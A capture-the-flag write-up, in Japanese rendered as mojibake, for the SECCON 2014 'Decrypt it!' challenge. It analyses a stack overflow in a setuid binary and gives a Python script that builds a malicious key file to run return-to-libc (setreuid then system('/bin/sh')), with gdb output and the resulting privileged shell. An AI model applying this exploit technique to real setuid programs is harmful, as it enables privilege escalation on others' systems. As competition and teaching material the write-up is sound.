SECCON 2014 オンライン予é¸ï¼ˆæ—¥æœ¬èªžï¼‰ Decrypt it! Write-up è£é¢
表ã¯ここ。
æš—å·åŒ–プãƒã‚°ãƒ©ãƒ ã¨æš—å·åŒ–ã—ãŸãƒ•ã‚¡ã‚¤ãƒ«ãŒä¸Žãˆã‚‰ã‚Œã¦ã€ãƒ•ã‚¡ã‚¤ãƒ«ã‚’復å·ã™ã‚‹å•é¡Œã€‚æš—å·åŒ–ã®ã‚³ãƒžãƒ³ãƒ‰ã¯
$ ./crypt 1 pub.txt flag.pdf flag.bin
cryptã«ã¯ãƒãƒƒãƒ•ã‚¡ãƒ¼ã‚ªãƒ¼ãƒãƒ¼ãƒ•ãƒãƒ¼ã®è„†å¼±æ€§ãŒå˜åœ¨ã™ã‚‹ã®ã§ã€æ”»æ’ƒã—ã¦ã¿ã‚‹ã€‚
[kusano@www10383uf Decrypt it!]$ ll total 704 -rwsr-xr-x 1 seccon seccon 13956 Aug 3 17:12 crypt -rw-rw-r-- 1 kusano kusano 701103 Aug 3 17:12 flag.pdf
ã“ã®çŠ¶æ³ã§ã€ä¸Šè¨˜ã®ã‚³ãƒžãƒ³ãƒ‰ã§cryptã«ç´°å·¥ã—ãŸpub.txtを渡ã—ã€uid=secconã®ã‚·ã‚§ãƒ«ã‚’èµ·å‹•ã™ã‚‹ã“ã¨ã‚’目指ã™ã€‚
環境
cryptã®ã‚¹ã‚¿ãƒƒã‚¯ã¯å®Ÿè¡Œä¸å¯ã§ã€SSP(スタックガード)ãŒã‚ã‚Šã€PIEã¯ç„¡åŠ¹ã€‚
[kusano@www10383uf Decrypt it!]$ objdump -p crypt
crypt: file format elf32-i386
Program Header:
PHDR off 0x00000034 vaddr 0x08048034 paddr 0x08048034 align 2**2
filesz 0x00000120 memsz 0x00000120 flags r-x
INTERP off 0x00000154 vaddr 0x08048154 paddr 0x08048154 align 2**0
filesz 0x00000013 memsz 0x00000013 flags r--
LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
filesz 0x00002277 memsz 0x00002277 flags r-x
LOAD off 0x00002ee0 vaddr 0x0804bee0 paddr 0x0804bee0 align 2**12
filesz 0x000001c0 memsz 0x000001cc flags rw-
DYNAMIC off 0x00002ef8 vaddr 0x0804bef8 paddr 0x0804bef8 align 2**2
filesz 0x000000f8 memsz 0x000000f8 flags rw-
NOTE off 0x00000168 vaddr 0x08048168 paddr 0x08048168 align 2**2
filesz 0x00000044 memsz 0x00000044 flags r--
EH_FRAME off 0x00001d94 vaddr 0x08049d94 paddr 0x08049d94 align 2**2
filesz 0x000000c4 memsz 0x000000c4 flags r--
STACK off 0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**2
filesz 0x00000000 memsz 0x00000000 flags rw-
RELRO off 0x00002ee0 vaddr 0x0804bee0 paddr 0x0804bee0 align 2**0
filesz 0x00000120 memsz 0x00000120 flags r--
 :
[kusano@www10383uf Decrypt it!]$ objdump -d crypt
 :
8049b7d: 8b 94 24 ac 01 00 00 mov 0x1ac(%esp),%edx
8049b84: 65 33 15 14 00 00 00 xor %gs:0x14,%edx
8049b8b: 0f 84 91 00 00 00 je 8049c22 <uncompress@plt+0xe02>
8049b91: e9 87 00 00 00 jmp 8049c1d <uncompress@plt+0xdfd>
 :
8049c1d: e8 5e f1 ff ff call 8048d80 <__stack_chk_fail@plt>
8049c22: 8b 5d fc mov -0x4(%ebp),%ebx
8049c25: c9 leave
8049c26: c3 retASLRã¯ç„¡åŠ¹ã«ã™ã‚‹ã€‚後述ã™ã‚‹ã‚ˆã†ã«ASLR有効ãªç’°å¢ƒä¸‹ã§ã¯æ”»æ’ƒã§ããªã‹ã£ãŸã€‚
[kusano@www10383uf Decrypt it!]$ sudo sysctl -w kernel.randomize_va_space=0 kernel.randomize_va_space = 0
プãƒã‚°ãƒ©ãƒ ã®è§£æž
crypterã®main関数ã¯æ¬¡ã®ã‚ˆã†ãªå‡¦ç†ã«ãªã£ã¦ã„る。stripã•ã‚Œã¦ã„ã‚‹ã®ã§ã‚¯ãƒ©ã‚¹åやメソッドåã¯é©å½“。
// 0x080498b9 int main(int argc, char **argv) { int argc2 = argc; int mode = 0; if (argc<=4) return 1; mode = atoi(argv[1]); int key[16]; int keynum = 0; string str; ifstream stream; stream.open(argv[2]); while (!stream.eof()) { stream >> str; key[keynum++] = atoi(str.c_str()); } f.close(); Crypter crypter; if (mode!=0) { crypter.loadPublicKey(key); string plain(argv[3]); crypter.loadPlain(plain); crypter.encrypt(); crypter.save(argv[4], false); } else { if (crypter.loadPrivateKey(v)!=0) return -1; string cipher(argv[3]); crypter.loadCipher(cipher); crypter.decrypt(); crypter.save(argv[4], true); } return 0; }
スタックé…ç½®ã¯æ¬¡ã®é€šã‚Šã€‚
esp+ 1c argv2 esp+ 20 key esp+ 60 crypter esp+ 7c str esp+ 80 plain esp+ 84 cipher esp+ 88 keynum esp+ 8c mode esp+ 94 stream esp+ 1ac カナリア esp+ 1b0 and $0xfffffff0,%esp ã§ã®ã‚ºãƒ¬ esp+ 1b4 ebx esp+ 1b8 ebp esp+ 1bc return address esp+ 1c0 argc esp+ 1c4 argv
攻略ã®æ–¹é‡
Return-to-libcã§ã€
setreuid(secconã®uid, -1); system("/bin/sh");
を実行ã™ã‚‹ã€‚
key以é™ã®å¤‰æ•°ã‚’ä»»æ„ã®å€¤ã«æ›¸ãæ›ãˆã‚‹ã“ã¨ãŒã§ãる。keynumã®å€¤ã‚’é©åˆ‡ã«æ›¸ãæ›ãˆã‚‹ã“ã¨ã§ã€canaryを飛ã°ã—ã¦ã€return addr以é™ã«å€¤ã‚’書ãè¾¼ã‚る。keyã¨keynumã®é–“ã®å¤‰æ•°ã®ã†ã¡ã€str以外ã¯åˆæœŸåŒ–å‰ãªã®ã§ã©ã‚“ãªå€¤ã‚’書ã込んã§ã‚‚構ã‚ãªã„。strã¯ãƒãƒƒãƒ•ã‚¡ã‚’指ã™ãƒã‚¤ãƒ³ã‚¿ã¨ãªã£ã¦ã„ã‚‹ã®ã§ã€é©åˆ‡ãªå€¤ã«ã—ãªã„ã¨returnå‰ã«ãƒ—ãƒã‚°ãƒ©ãƒ ãŒè½ã¡ã¦ã—ã¾ã†ã€‚atoiã¯ä½™è¨ˆãªæ–‡å—列ãŒã‚ã£ã¦ã‚‚無視ã™ã‚‹ã®ã§ã€systemã®å¼•æ•°ã«ä½¿ç”¨ã™ã‚‹æ–‡å—列ã¯æ•°å—ã®å¾Œã‚ã«ä»˜ã‘ã‚Œã°è‰¯ã„。
æƒ…å ±åŽé›†
ユーザーsecconã®uidã€setreuidã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã€systemã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã€strã®å€¤ãŒå¿…è¦ã€‚
[kusano@www10383uf Decrypt it!]$ id seccon
uid=505(seccon) gid=506(seccon) groups=506(seccon)
[kusano@www10383uf Decrypt it!]$ gdb --arg ./crypt 1 pub.txt flag.pdf flag.bin
 :
(gdb) b *0x8049972
Breakpoint 1 at 0x8049972
(gdb) r
Starting program: /home/kusano/seccon/Decrypt it!/crypt 1 pub.txt flag.pdf flag.bin
Breakpoint 1, 0x08049972 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.132.el6_5.2.i686 libgcc-4.4.7-4.el6.i686 libstdc++-4.4.7-4.el6.i686 zlib-1.2.3-29.el6.i686
(gdb) p setreuid
$1 = {<text variable, no debug info>} 0x68fc10 <setreuid>
(gdb) p system
$2 = {<text variable, no debug info>} 0x5f0210 <system>
(gdb) x/x $esp+0x7c
0xffffd55c: 0x0804f184ãã‚Œãžã‚Œã€505, 0x68fc10, 0x5f0210, 0x0804f184。
strã®ãƒã‚¤ãƒ³ã‚¿ã¯æ–‡å—列をèªã¿è¾¼ã‚€ã¨ãã«ã‚µã‚¤ã‚ºãŒè¶³ã‚Šãªã„ã¨å†ç¢ºä¿ã•ã‚Œã‚‹ã®ã§ã€ä¸€åº¦æ–‡å—列をèªã¿è¾¼ã¾ã›ã¦ã‹ã‚‰å–å¾—ã™ã‚‹ã€‚ã¾ãŸæ”»æ’ƒã™ã‚‹éš›ã«ã¯æœ€åˆã«é•·ã„æ–‡å—列をèªã¿è¾¼ã¾ã›ã‚‹ã¨ã€å†ç¢ºä¿ã«ã‚ˆã£ã¦ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒå¤‰ã‚ã‚‹ã“ã¨ãŒç„¡ããªã‚‹ã€‚
攻略
exploit.py
# coding: utf-8 cmd = "/bin/sh" uid = 505 setreuid = 0x0068fc10 system = 0x005f0210 strbuf = 0x0804f184 # 0ã®ç›´å¾Œã«ã‚³ãƒžãƒ³ãƒ‰ã®æ–‡å—列を書ã込む㨠# 大ããªæ•°å—ã‚’èªã¿è¾¼ã‚€éš›ã«ä¸Šæ›¸ãã•ã‚Œã¦ã—ã¾ã†ã®ã§ã€ç©ºã‘ã‚‹ pad = 16 print "0" + "_"*(pad-1) + cmd for _ in range((0x7c-0x20)/4-1): print 0 print strbuf for _ in range((0x88-0x80)/4): print 0 # key[keynum]ãŒãƒªã‚¿ãƒ¼ãƒ³ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’指ã™ã‚ˆã†ã«ã™ã‚‹ # 直後ã«keynum++ãŒã‚ã‚‹ã®ã§ã€-1 print (0x1bc-0x20)/4-1 print setreuid # pop; pop; ret; # systemを呼ã³å‡ºã™å‰ã«setreuidã®å¼•æ•°ã‚’クリアã™ã‚‹ print 0x080498b6 print uid print uid print system print 0 print strbuf + pad
[kusano@www10383uf Decrypt it!]$ python exploit.py > pub.txt [kusano@www10383uf Decrypt it!]$ cat pub.txt 0_______________/bin/sh 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 134541700 0 0 102 6880272 134518966 505 505 6226448 0 134541716 [kusano@www10383uf Decrypt it!]$ ./crypt 1 pub.txt flag.pdf flag.bin sh-4.1$ id uid=505(seccon) gid=500(kusano) groups=506(seccon),10(wheel),500(kusano)
ASLR
ã©ã†ã›ãªã‚‰ã€ASLRãŒæœ‰åŠ¹ãªç’°å¢ƒä¸‹ã§æ”»ç•¥ã—ãŸã‹ã£ãŸãŒã€ãªã‹ãªã‹é›£ã—ã„。
Return-oriented Programmingã‚’ã—よã†ã«ã‚‚ã€ãƒ—ãƒã‚°ãƒ©ãƒ ãŒçŸã„ã®ã§gadgetãŒè¶³ã‚Šãªã„。
↑ã®æ”»æ’ƒã‚³ãƒ¼ãƒ‰ã¯ã‚¹ã‚¿ãƒƒã‚¯ä½ç½®ã«ã¯ä¾å˜ã—ã¦ãŠã‚‰ãšã€libcã®ä½ç½®ã¨strã®ãƒ’ープä½ç½®ã«ä¾å˜ã—ã¦ã„る。libcã®ä½ç½®ã«ã¤ã„ã¦ã¯ASLRã«ã‚ˆã‚‹ãƒ©ãƒ³ãƒ€ãƒ 化ãŒæ¯”較的å°ã•ã„ã®ã§è©¦è¡Œå›žæ•°ã‚’増やã›ã°ã„ã‘ãã†ã ãŒã€ãƒ’ープä½ç½®ãŒé›£ã—ã„。strãŒæŒ‡ã—ã¦ã„ã‚‹ãƒãƒƒãƒ•ã‚¡ã¯å˜ã«æ–‡å—åˆ—ã‚’æ ¼ç´ã™ã‚‹ã ã‘ã§ã¯ãªãã€strãŒæŒ‡ã—ã¦ã„ã‚‹ä½ç½®ã‚ˆã‚Šå‰ã«æ–‡å—列長やãƒãƒƒãƒ•ã‚¡ã‚µã‚¤ã‚ºã®æƒ…å ±ãŒå˜åœ¨ã—ã¦ã„ã‚‹ã®ã§ã€å˜ã«æ›¸ãè¾¼ã¿å¯èƒ½ãªã‚¢ãƒ‰ãƒ¬ã‚¹ã§ä¸Šæ›¸ãã™ã‚‹ã ã‘ã§ã¯ãƒ€ãƒ¡ã€‚
[kusano@www10383uf Decrypt it!]$ gdb --arg ./crypt 1 pub.txt flag.pdf flag.bin  : (gdb) b *0x8049972 Breakpoint 1 at 0x8049972 (gdb) r  : (gdb) x/x $esp+0x7c 0xffffd55c: 0x0804f184 (gdb) x/32x 0x0804f140 0x804f140: 0x00000000 0x00000000 0x00000000 0x00000000 0x804f150: 0x00000000 0x00000000 0x00000000 0x00000000 0x804f160: 0x00000000 0x00000000 0x00000000 0x00000000 0x804f170: 0x00000000 0x00000029 0x00000017 0x00000017 0x804f180: 0x00000000 0x5f5f5f30 0x5f5f5f5f 0x5f5f5f5f 0x804f190: 0x5f5f5f5f 0x6e69622f 0x0068732f 0x0001ee69 0x804f1a0: 0x00000000 0x00000000 0x00000000 0x00000000 0x804f1b0: 0x00000000 0x00000000 0x00000000 0x00000000
